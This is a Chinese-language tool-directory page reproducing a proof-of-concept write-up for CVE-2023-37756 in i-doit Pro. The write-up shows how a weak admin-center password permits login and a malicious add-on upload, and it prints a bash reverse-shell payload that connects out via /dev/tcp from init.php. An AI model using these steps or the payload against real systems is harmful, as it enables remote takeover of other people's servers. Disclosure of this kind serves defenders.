Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2023-37756-CWE-521-lead-to-malicious-plugin-upload-in-the-i-doit-Pro-25-and-below — 针对CVE-2023-37756的概念验证:i-doit Pro管理中心的弱密码要求允许暴力登录和恶意插件上传,从而导致远程代码执行。 | Kitploit
工具/GitHubGitHub/leekenghwa/cve-2023-37756-cwe-521-lead-to-malicious-plugin-upload-in-the-i-doit-pro-25-and-below
密码攻击漏洞分析漏洞利用Web应用程序漏洞利用错误配置Payload 开发
GitHubleekenghwa/cve-2023-37756-cwe-521-lead-to-malicious-plugin-upload-in-the-i-doit-pro-25-and-below

CVE-2023-37756-CWE-521-lead-to-malicious-plugin-upload-in-the-i-doit-Pro-25-and-below

针对CVE-2023-37756的概念验证:i-doit Pro管理中心的弱密码要求允许暴力登录和恶意插件上传,从而导致远程代码执行。

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
查看仓库
12年前尚未审核

CVE-2023-37756 – i-doit Pro 25及以下版本中admin-center的弱密码要求导致恶意插件上传

i-doit Pro 25及以下版本存在admin-center弱密码要求漏洞,并结合恶意插件上传可导致远程代码执行(RCE)漏洞。这些漏洞可能允许攻击者轻易通过暴力破解或密码猜测获取admin-center访问权限,并上传恶意插件以实现远程代码执行。

产品描述:i-doit是一款基于Web的开源IT文档与CMDB(配置管理数据库)软件,由synetics GmbH开发。i-doit Pro是该软件的商业版本,需要付费许可。它提供额外功能、专业支持以及定期更新与增强。用户需购买许可方可使用i-doit Pro,价格根据用户数量及所需功能而定。

漏洞描述:我们发现该Web应用程序在admin-center账户创建时存在弱密码要求,应用所有者甚至可以使用默认用户名“admin”设置最低1个字符的密码。这可能导致攻击者轻易通过暴力破解或密码猜测获取admin-center访问权限,并上传恶意插件以实现远程代码执行。

受影响页面:admin-center登录页面 + 插件安装

受影响的参数与组件:admin-center登录页面 + 插件安装

步骤1:由于admin-center账户创建时未实施密码要求或密码复杂度,我们可以从暴力破解开始。以下截图显示我们可以使用用户名“admin”及密码“1”登录。

Password_1_login_result

step2

步骤2:导航至“Add-on”标签页并选择上传

step3

步骤3:存在一些要求,例如必须存在package.json,并且我们发现目标已实现异步检查所有类和函数。但我们可以从其客户门户下载一个合适的插件,然后编辑/添加init.php,这是防止触发payload时系统崩溃的最安全方法。 注意:请在行末加上 & 以防止payload触发后系统崩溃,init.php是注入payload的最佳位置 示例:exec ("/bin/bash -c 'bash -i >& /dev/tcp/IP/Port 0>&1 &'");

step4

step5

step6

注意:记得将其重新压缩并上传

step7

step8

注意:点击“Install”然后激活选中的Add-on

step9

注意:当有人登录时,你的payload将被触发,可以是任何人。

final

下载工具